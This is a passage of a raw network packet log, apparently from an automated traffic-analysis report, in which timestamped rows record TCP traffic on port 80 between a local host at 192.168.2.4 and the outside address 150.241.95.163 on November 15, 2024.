                                                                                                                                                                Nov 15, 2024 10:28:30.735100985 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.735112906 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.735124111 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.735141993 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.735176086 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.735287905 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.735299110 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.735322952 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.735342026 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.735352993 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.735375881 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.735380888 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.735393047 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.735529900 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.735532999 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.735541105 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.735559940 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.735565901 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.735570908 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.735583067 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.735593081 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.735625029 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.735646009 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.735656977 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.735667944 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.735687017 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.736159086 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.736170053 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.736202955 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.736206055 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.736213923 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.736252069 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.736284018 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.736294985 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.736306906 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.736320972 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.736326933 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.736340046 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.736428022 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.736439943 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.736450911 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.736460924 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.736488104 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.777609110 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.777630091 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.777642965 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.777694941 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.832474947 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.832496881 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.832515001 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.832545996 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.832725048 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.832736969 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.832779884 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.864130020 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864156008 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864175081 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864187002 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864198923 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864211082 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864228964 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864278078 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.864289999 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864300966 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864312887 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864324093 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864332914 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.864341021 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864351988 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.864407063 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.864428043 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864438057 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864449024 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864460945 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864464045 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.864471912 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864486933 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864501953 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.864526987 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.864598036 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864609003 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864619970 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864630938 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864634037 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.864643097 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864654064 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864695072 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.864703894 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.864739895 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864751101 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864763021 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864789009 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.864804983 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.864808083 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864820004 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864836931 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864849091 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864855051 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.864892006 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.864953995 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864965916 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864976883 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864986897 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.864998102 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.865001917 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.865010023 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.865020037 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.865021944 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.865031004 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.865042925 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.865063906 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.865082026 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.865114927 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.865199089 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.865211010 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.865221977 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.865231991 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.865242958 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.865253925 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.865259886 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.865266085 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.865287066 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.865416050 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.865427017 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.865437031 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.865454912 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.865466118 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.865473032 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.865478039 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.865484953 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.865503073 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.865528107 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.865545988 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.865571976 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.865582943 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.865600109 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.865622997 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.900845051 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.900923967 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.900949955 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.900959969 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.900981903 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.901000977 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.942354918 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.955945969 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.955996037 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.956015110 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.956027985 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.956038952 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.956039906 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.956063032 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.987684965 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.987708092 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.987768888 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.987823009 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.987869024 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.987881899 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.987894058 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.987930059 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.987972975 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.987984896 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.987997055 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.988008976 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.988020897 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.988039970 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.988146067 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.988162994 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.988174915 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.988184929 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.988198042 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.988205910 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.988208055 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.988220930 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.988235950 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.988238096 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.988251925 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.988255978 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.988264084 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.988274097 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.988276005 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.988369942 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.988384008 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.988408089 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.988435030 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.988466024 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.988476038 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.988501072 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.988933086 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.988945007 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.988955975 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.988980055 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.989003897 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.989007950 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.989021063 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.989033937 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.989044905 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.989054918 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.989058971 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.989087105 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.989088058 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.989098072 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.989123106 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.989197016 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.989206076 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.989234924 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.989428043 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.989448071 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.989460945 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.989463091 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.989490032 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.989664078 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.989676952 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.989686966 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.989698887 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.989706993 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.989733934 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.989869118 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.989880085 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.989890099 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.989895105 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.989900112 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.989912033 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.989922047 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.989933968 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.989960909 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.989993095 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.990025997 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.990032911 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.990392923 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.990430117 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.990515947 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.990622997 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.990633965 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.990658998 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.990778923 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.990823030 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.990962982 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.990987062 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.990998983 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.991008997 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.991019011 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.991025925 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.991030931 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.991039038 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.991040945 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.991051912 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.991063118 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.991070032 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.991072893 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.991085052 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.991087914 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.991096973 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.991107941 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.991130114 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.991163015 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.991173029 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.991197109 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.991198063 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.991209984 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.991245985 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.991251945 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.024349928 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.024365902 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.024378061 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.024461031 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.024485111 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.079168081 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.079205036 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.079216003 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.079332113 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.079344034 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.079348087 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.079360008 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.079370022 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.079372883 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.079375982 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.079418898 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.111342907 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.111360073 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.111371994 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.111382961 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.111402035 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.111413002 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.111478090 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.111488104 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.111498117 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.111509085 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.111516953 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.111516953 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.111531973 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.111562967 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.111586094 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.111598015 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.111603975 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.111608982 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.111613989 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.111681938 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.111689091 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.111700058 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.111710072 CET8049736150.241.95.163192.168.2.4
